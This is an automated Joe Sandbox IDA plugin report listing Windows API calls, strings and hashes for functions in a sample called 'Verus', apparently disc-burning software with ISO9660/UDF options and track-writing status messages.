Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Object$Window$Stock$ClientRect$CreateScreenSelect$DrawMoveReleaseTextlstrlen
String ID: P$P$P$P
API String ID: 2926981776-3287816361
Opcode ID: 02fcd99d542fa82970e25e011eac1f398c0946f397a42c957d2e95535f7e387a
Instruction ID: 9c64a8a6a36e6149639d51c9a9e2f80537375cca8bd4b85f936c9f1802290d89
Opcode Fuzzy Hash: 02fcd99d542fa82970e25e011eac1f398c0946f397a42c957d2e95535f7e387a
Instruction Fuzzy Hash: 6D914CB1644304AFE724DF69DC82F5BB7E9EF84B04F00491DF6499B2C0D6B5E9048B66

Function 0043A360 Relevance: 37.8, APIs: 25, Instructions: 253windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000015), ref: 0043A3DC
GetSysColor.USER32(00000015), ref: 0043A3E6
InflateRect.USER32(?,000000FF,000000FF), ref: 0043A418
OffsetRect.USER32(?,00000001,00000001), ref: 0043A43A
DrawFrameControl.USER32(?,?,00000004,00000000), ref: 0043A452
GetWindowTextW.USER32(?,?,0000003F), ref: 0043A467
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043A477
SelectObject.GDI32(?,00000000), ref: 0043A47F
SetBkMode.GDI32(?,00000001), ref: 0043A48C
GetSysColor.USER32(-00000011), ref: 0043A49D
SetTextColor.GDI32(?,00000000), ref: 0043A4A5
DrawTextW.USER32(?,?,000000FF,?,00000420), ref: 0043A4F8
OffsetRect.USER32(?,?,?), ref: 0043A51F
DrawStateW.USER32(?,00000000,00000000,?,00000000,?,?,?,?,00000022), ref: 0043A546
GetSysColor.USER32(00000014), ref: 0043A58C
GetSysColor.USER32(00000010), ref: 0043A598
SelectObject.GDI32(?,?), ref: 0043A5C8
DrawTextW.USER32(?,004C88D0,00000001,?,00000024), ref: 0043A5FB
GetStockObject.GDI32(00000005), ref: 0043A603
SelectObject.GDI32(?,00000000), ref: 0043A60B
InflateRect.USER32(?,000000FD,000000FD), ref: 0043A618
DrawFocusRect.USER32(?,?), ref: 0043A62B
SelectObject.GDI32(?,00000000), ref: 0043A633
SelectObject.GDI32(?,?), ref: 0043A63B

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: ColorObject$DrawRectSelect$Text$InflateOffset$ControlFocusFrameMessageModeSendStateStockWindow
String ID:
API String ID: 277780351-0
Opcode ID: f11507aa2dbce015dc5bcbba312a0a52399420e05fa56afcf208eb728c18b8b8
Instruction ID: cf1dc0dda120fed14a93164f9959bf8a1736104d9af6420fe4e267ed6d343a54
Opcode Fuzzy Hash: f11507aa2dbce015dc5bcbba312a0a52399420e05fa56afcf208eb728c18b8b8
Instruction Fuzzy Hash: 30A116B1248301AFD354DFA8CD44E6BBBE8FBC8710F104A2DF69587290D774A804CB6A

Function 00451220 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 282windowCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(00000004), ref: 00451268
FillRect.USER32(?,?,00000000), ref: 00451278
DrawEdge.USER32(?,?,00000006,00000002), ref: 004512C2
GetSysColorBrush.USER32(0000001D), ref: 004512D4
FillRect.USER32(?,?,00000000), ref: 004512E4
GetSysColorBrush.USER32(0000000D), ref: 004512EC
FrameRect.USER32(?,?,00000000), ref: 004512FC
OffsetRect.USER32(?,00000000,?), ref: 0045134F
InflateRect.USER32(?,000000FF,000000FF), ref: 00451385
GetSysColorBrush.USER32(00000004), ref: 00451391
FillRect.USER32(?,?,00000000), ref: 004513A5
GetSysColorBrush.USER32(0000000D), ref: 004513AD
FrameRect.USER32(?,?,00000000), ref: 004513C1
ImageList_Draw.COMCTL32(?,?,?,?,?,00000001), ref: 00451434
GetSysColorBrush.USER32(00000004), ref: 00451455
GetSysColorBrush.USER32(00000010), ref: 0045145F
_memset.LIBCMT ref: 00451491
GetMenuItemInfoW.USER32 ref: 004514B8
SetBkMode.GDI32(?,00000001), ref: 0045152D
GetSysColor.USER32(?), ref: 00451553

Strings

,, xrefs: 004514A8

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Color$BrushRect$Fill$DrawFrame$EdgeImageInflateInfoItemList_MenuModeOffset_memset
String ID: ,
API String ID: 447778773-3772416878
Opcode ID: e0c6e24d5ef139f21c8912b41f54dff9b07d92fba1b4f1eca80e47abc62aac57
Instruction ID: e89946542ce2f0c974a6c84eeab9a6db626c0e2df7e393bf617c3f43287369e9
Opcode Fuzzy Hash: e0c6e24d5ef139f21c8912b41f54dff9b07d92fba1b4f1eca80e47abc62aac57
Instruction Fuzzy Hash: 80B117B1204341AFD354CF68D994F6BBBE9BBC8315F148A2DF98983291D774E808CB56

Function 00460850 Relevance: 35.1, APIs: 15, Strings: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000004BB), ref: 0046085F
SendMessageW.USER32(00000000,00000143,00000000,ISO9660), ref: 0046087D
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0046088C
SendMessageW.USER32(?,00000143,00000000,ISO9660 + UDF), ref: 0046089E
SendMessageW.USER32(?,00000151,00000001,00000001), ref: 004608AD
SendMessageW.USER32(?,00000143,00000000,ISO9660 + UDF (DVD-Video)), ref: 004608BF
SendMessageW.USER32(?,00000151,00000002,00000002), ref: 004608CE
SendMessageW.USER32(?,00000143,00000000,UDF), ref: 004608E0
SendMessageW.USER32(?,00000151,00000003,00000003), ref: 004608EF
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004608FE
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00460910
SendMessageW.USER32(?,00000146,00000000,00000000), ref: 0046092C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0046093F
EnableWindow.USER32(?,00000000), ref: 00460959
SetDlgItemTextW.USER32(?,000004BA,?), ref: 0046099C

Strings

UDF, xrefs: 004608D3
ISO9660 + UDF (DVD-Video), xrefs: 004608B2
ISO9660 + UDF, xrefs: 00460891
ISO9660, xrefs: 0046086B
projectprop, xrefs: 00460969

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Item$EnableTextWindow
String ID: ISO9660$ISO9660 + UDF$ISO9660 + UDF (DVD-Video)$UDF$projectprop
API String ID: 1460644709-1470253537
Opcode ID: cf9bd353dfd884dcfd2cf3bbeaa4a1e6aba15c73cd974e3465eef6197ef82e58
Instruction ID: a4d1a354bf675c2e2606555b6c461a2022ac13549e1dbfcbcf8b50147c6cd3b0
Opcode Fuzzy Hash: cf9bd353dfd884dcfd2cf3bbeaa4a1e6aba15c73cd974e3465eef6197ef82e58
Instruction Fuzzy Hash: C54160B13807047BF22497A59D96F67B39A9BC4F08F10490AB346AF2D1D7F8F8058B19

Function 00450430 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 243windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 004504A5
_memset.LIBCMT ref: 004504D8
GetMenuItemInfoW.USER32 ref: 00450512
CharNextW.USER32(?), ref: 0045054C
CharLowerW.USER32(?), ref: 0045056E
CharLowerW.USER32(?), ref: 00450579
PostMessageW.USER32(?,00000448,000000FF), ref: 004505D1
SendMessageW.USER32(?,0000045A,?,?), ref: 00450625
PostMessageW.USER32(?,00000448,000000FF), ref: 0045063C
IsWindowEnabled.USER32(?), ref: 0045067E
GetClientRect.USER32(?,?), ref: 004506A6
SendMessageW.USER32(?,0000041D,?,?), ref: 004506D0
SendMessageW.USER32(?,00000417,?,?), ref: 00450709
PostMessageW.USER32(?,00000100,00000028), ref: 00450755

Part of subcall function 0044EB60: SendMessageW.USER32(?,00000446,00100000,?), ref: 0044EB9D
Part of subcall function 0044EB60: InvalidateRect.USER32(?,00000000,00000001), ref: 0044EBAB

MessageBeep.USER32 ref: 0045076A

Strings

,, xrefs: 004504F0
?, xrefs: 00450503
d, xrefs: 004504F8
/, xrefs: 0045064D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Message$Send$CharPost$ItemLowerMenuRect$BeepClientCountEnabledInfoInvalidateNextWindow_memset
String ID: ,$/$?$d
API String ID: 2273569999-4052593984
Opcode ID: 5b0347fc787d3b8d146ef0e806dc0b5cf871d3a4c858d8714e97e3ae36a68d06
Instruction ID: 9d8455e4de49d62a1be1c0e4ea4c9a03082b665fabbf10752e2778a5c3a7dec6
Opcode Fuzzy Hash: 5b0347fc787d3b8d146ef0e806dc0b5cf871d3a4c858d8714e97e3ae36a68d06
Instruction Fuzzy Hash: D1918DB45083449FD720DF25C950BABBBE5BBC8705F00492EF9C987252D7789849CF6A

Function 00466B50 Relevance: 33.3, APIs: 12, Strings: 7, Instructions: 98librarystringCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(d3d8thk.dll), ref: 00466BA7
FreeLibrary.KERNEL32(00000000), ref: 00466BB9
LoadLibraryW.KERNEL32(d3d9.dll), ref: 00466BC0
FreeLibrary.KERNEL32(00000000), ref: 00466BCB
LoadLibraryW.KERNEL32(d3dx9_32.dll), ref: 00466BD2
FreeLibrary.KERNEL32(00000000), ref: 00466BDD
LoadLibraryW.KERNEL32(dwmapi.dll), ref: 00466BE4
FreeLibrary.KERNEL32(00000000), ref: 00466BEF
GetWindowRect.USER32(?,?), ref: 00466BFA
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00466C43

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

Part of subcall function 00476FF0: lstrlenW.KERNEL32(?,?,0041F8B9,005394B4), ref: 00476FF6

lstrcatW.KERNEL32(?,ckEffects.exe), ref: 00466C6A
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,0000000A), ref: 00466C88

Strings

ckEffects.exe, xrefs: 00466C60
d3d9.dll, xrefs: 00466BBB
open, xrefs: 00466C81
d3dx9_32.dll, xrefs: 00466BCD
dwmapi.dll, xrefs: 00466BDF
d3d8thk.dll, xrefs: 00466BA2
-host=%I64x -dim=%d,%d,%d,%d, xrefs: 00466C29

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Library$FreeLoadlstrlen$ExecuteFileModuleNameRectShellWindowlstrcat
String ID: -host=%I64x -dim=%d,%d,%d,%d$ckEffects.exe$d3d8thk.dll$d3d9.dll$d3dx9_32.dll$dwmapi.dll$open
API String ID: 1170302741-2263023492
Opcode ID: b20155f761d525f0900c3bb0cd14edfbd9f9a3a5aba783f69f074db0624c258f
Instruction ID: 54aeb37f16d5c6df1055bf3d7bbcc6140db6ff707b726a4c67ebb24de4ceb3c7
Opcode Fuzzy Hash: b20155f761d525f0900c3bb0cd14edfbd9f9a3a5aba783f69f074db0624c258f
Instruction Fuzzy Hash: 6331E4B1A00305BFD720DBA0DC49FAB77ACEBC8714F05461EF58492280E678E944CB6A

Function 004571B0 Relevance: 33.3, APIs: 12, Strings: 7, Instructions: 98librarystringCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(d3d8thk.dll), ref: 00457207
FreeLibrary.KERNEL32(00000000), ref: 00457219
LoadLibraryW.KERNEL32(d3d9.dll), ref: 00457220
FreeLibrary.KERNEL32(00000000), ref: 0045722B
LoadLibraryW.KERNEL32(d3dx9_32.dll), ref: 00457232
FreeLibrary.KERNEL32(00000000), ref: 0045723D
LoadLibraryW.KERNEL32(dwmapi.dll), ref: 00457244
FreeLibrary.KERNEL32(00000000), ref: 0045724F
GetWindowRect.USER32(?,?), ref: 0045725A
GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 004572A3

Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 0047711E
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477135
Part of subcall function 00477110: lstrlenW.KERNEL32(?,?,?,?,0041A5D4,?), ref: 00477154

Part of subcall function 00476FF0: lstrlenW.KERNEL32(?,?,0041F8B9,005394B4), ref: 00476FF6

lstrcatW.KERNEL32(?,ckEffects.exe), ref: 004572CA
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,0000000A), ref: 004572E8

Strings

ckEffects.exe, xrefs: 004572C0
d3d9.dll, xrefs: 0045721B
open, xrefs: 004572E1
d3dx9_32.dll, xrefs: 0045722D
dwmapi.dll, xrefs: 0045723F
d3d8thk.dll, xrefs: 00457202
-host=%I64x -dim=%d,%d,%d,%d, xrefs: 00457289

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Library$FreeLoadlstrlen$ExecuteFileModuleNameRectShellWindowlstrcat
String ID: -host=%I64x -dim=%d,%d,%d,%d$ckEffects.exe$d3d8thk.dll$d3d9.dll$d3dx9_32.dll$dwmapi.dll$open
API String ID: 1170302741-2263023492
Opcode ID: d05b16b4685020b324c589a3b05706b076aaebd83f3bc8c0a170d26386a1003b
Instruction ID: 75ef4ebfa1515adf3144ed03e6d96601a64d89b38b0fb7acaf222e8eb428ab26
Opcode Fuzzy Hash: d05b16b4685020b324c589a3b05706b076aaebd83f3bc8c0a170d26386a1003b
Instruction Fuzzy Hash: B631F9B1A043057FD760DBA0EC46FBB73ACABC8715F04452EF94492281D778D908CB6A

Function 00426D00 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 184COMMON

Download Yara Rule

APIs

Part of subcall function 004265D0: _strncmp.LIBCMT ref: 004265EE

_strncmp.LIBCMT ref: 00426D35
_strncmp.LIBCMT ref: 00426D5F
_swscanf.LIBCMT ref: 00426D83

Strings

Writing time:, xrefs: 00426DE7
Writing pregap for track %d at %ld, xrefs: 00426D7D
WARNING:, xrefs: 00426EA8
Waiting for reader, xrefs: 00426DCC
Starting new track, xrefs: 00426D2F
Re-load, xrefs: 00426EE2
Writing pregap, xrefs: 00426D59
Fixating time:, xrefs: 00426E6B
Fixating..., xrefs: 00426E30

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: _strncmp$_swscanf
String ID: Fixating time:$Fixating...$Re-load$Starting new track$WARNING:$Waiting for reader$Writing time:$Writing pregap$Writing pregap for track %d at %ld
API String ID: 3955417911-4121323230
Opcode ID: 14c0a45a0a9784bfe623628295a71943348e422a146d692e0f6050e73f99dd5e
Instruction ID: fbf6372ff2e53f422d3628c8ee3a8c403ce6351720e988ac7015a9ac8e7630fb
Opcode Fuzzy Hash: 14c0a45a0a9784bfe623628295a71943348e422a146d692e0f6050e73f99dd5e
Instruction Fuzzy Hash: BD5124B1740300ABEB20DB60DC42F6BB3A9AF45704F01451EFA1997381FA79B851C7AE

Function 00446AB0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 165windowstringCOMMON

Download Yara Rule

APIs

IsMenu.USER32(?), ref: 00446AD7
DestroyMenu.USER32(?), ref: 00446AF3
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 00446B18
SendMessageW.USER32(?,00000418,00000000,00000000), ref: 00446B25
SendMessageW.USER32(?,00000416,00000000,00000000), ref: 00446B3B
GetMenuItemCount.USER32(?), ref: 00446B4E
_memset.LIBCMT ref: 00446B6A
GetMenuItemInfoW.USER32 ref: 00446BA5
lstrlenW.KERNEL32(?), ref: 00446BB0
SetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 00446BCF
SendMessageW.USER32(?,00000443,000000FF,?), ref: 00446C2B
SendMessageW.USER32(?,00000440,00000000,?), ref: 00446C75
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00446C8B
InvalidateRect.USER32(?,00000000,00000001), ref: 00446C94
UpdateWindow.USER32(?), ref: 00446C9E

Strings

,, xrefs: 00446B85
, xrefs: 00446C61
d, xrefs: 00446B9D

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: MessageSend$Menu$Item$Info$CountDestroyInvalidateRectUpdateWindow_memsetlstrlen
String ID: $,$d
API String ID: 3992055527-2731744019
Opcode ID: a2a5d171f15b6fe4d4580a4c357c2d3239b24b1b8020e08fcfe876ed07a8710c
Instruction ID: 7ac5e9d136a88124734234dedb722f1d3fb54f4a231076b859fd3f55159d2866
Opcode Fuzzy Hash: a2a5d171f15b6fe4d4580a4c357c2d3239b24b1b8020e08fcfe876ed07a8710c
Instruction Fuzzy Hash: DF515AB1504741AFE360CF64C985B5BBBE8FB89704F104A2DF298D7290D775E804CB9A

Function 0043E790 Relevance: 31.7, APIs: 21, Instructions: 155stringwindowCOMMON

Download Yara Rule

APIs

SetDlgItemTextW.USER32(?,000003FD,?), ref: 0043E7A7
GetDlgItem.USER32(?,000003FD), ref: 0043E7BC
GetDlgItem.USER32(?,00000472), ref: 0043E7CD
GetDC.USER32(00000000), ref: 0043E7D4
SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 0043E7E7
SelectObject.GDI32(00000000,00000000), ref: 0043E7EF
GetDlgItem.USER32(?,000003FD), ref: 0043E802
GetWindowRect.USER32(00000000,?), ref: 0043E80A
ScreenToClient.USER32(?,?), ref: 0043E819
ScreenToClient.USER32(?,?), ref: 0043E82C
lstrlenW.KERNEL32 ref: 0043E851
DrawTextW.USER32(00000000,?,00000000), ref: 0043E85A
GetDlgItem.USER32(?,000003FD), ref: 0043E86B
MoveWindow.USER32(00000000,00000410,?,?,00000000,00000001), ref: 0043E888
SelectObject.GDI32(00000000,?), ref: 0043E890
GetWindowRect.USER32(?,?), ref: 0043E8A0
ScreenToClient.USER32(?,?), ref: 0043E8B5
ScreenToClient.USER32(?,?), ref: 0043E8C4
SetWindowPos.USER32(?,00000000,?,?,?,?,00000000), ref: 0043E8F3
GetWindowRect.USER32(?,?), ref: 0043E906
MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0043E92C

Memory Dump Source

Source File: 00000000.00000002.2122768342.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2122751785.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122832297.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122865171.00000000004EB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122884155.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122902160.00000000004F1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122917409.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.000000000053D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.0000000000576000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2122939718.00000000005BA000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Verus.jbxd

Similarity

API ID: Window$Item$ClientScreen$Rect$MoveObjectSelectText$DrawMessageSendlstrlen
String ID:
API String ID: 1962805013-0
Opcode ID: b2a337f0fa575b0f09b633e1429b3a9374b4172110e9a1d46f65716d805a600d
Instruction ID: 844cbf09b1feab7743ade464c7de6ecd11954396e56957638e76fb9c0211f6bd
Opcode Fuzzy Hash: b2a337f0fa575b0f09b633e1429b3a9374b4172110e9a1d46f65716d805a600d
Instruction Fuzzy Hash: FD512BB6604305AFD214DFA9DE98E2BB7FDEBC8B40F00892CF64583250DA74E905CB65

Function 00460430 Relevance: 31.6, APIs: 21, Instructions: 112windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000434), ref: 00460444
SendMessageW.USER32(00000000,000000C5,0000007F,00000000), ref: 00460456
GetDlgItem.USER32(?,00000436), ref: 00460461
SendMessageW.USER32(00000000,000000C5,0000007F,00000000), ref: 0046046D
GetDlgItem.USER32(?,00000437), ref: 00460478
SendMessageW.USER32(00000000,000000C5,0000007F,00000000), ref: 00460484
GetDlgItem.USER32(?,00000438), ref: 0046048F
SendMessageW.USER32(00000000,000000C5,0000007F,00000000), ref: 0046049B
GetDlgItem.USER32(?,0000043D), ref: 004604A6
SendMessageW.USER32(00000000,000000C5,00000024,00000000), ref: 004604B2
GetDlgItem.USER32(?,0000043E), ref: 004604BD
